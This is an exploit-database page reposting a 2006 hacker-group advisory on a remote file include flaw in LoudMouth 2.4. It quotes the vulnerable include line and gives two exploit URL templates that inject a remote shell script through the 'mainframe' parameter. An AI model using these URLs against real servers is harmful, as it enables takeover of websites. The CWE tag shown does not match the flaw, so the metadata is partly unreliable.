Advertisement






LoudMouth => 2.4 Remote File Include Vulnerabilities

CVE Category Price Severity
CVE-2006-2190 CWE-434 Not specified High
Author Risk Exploitation Type Date
enelK0 High Remote 2006-12-01
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.08957 0.686

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006110107

Below is a copy:

"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """ 
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """ 
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
        Xmor$ DigitaL Hacking TeaM

# LoudMouth =>  2.4 Remote File Include Vulnerabilities
# Script.............. : LoudMouth
# Discovered by.... : the_Edit0r	
# Location .......... : Iran
# Class..............  : Remote
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r 
#      D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
#  ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
#   Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

# CodE : 
  
  require_once( $mainframe-getPath( 'admin_html' )

# Expl0its : 
 
  Www.Site.coM/[path]/admin.loudmouth.php?mainframe=[Sh3ll-Script]
  Www.Site.coM/[path]/toolbar.loudmouth.php?mainframe=[Sh3ll-Script]

# Contact me : the_3dit0r[at]Yahoo[dot]coM

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum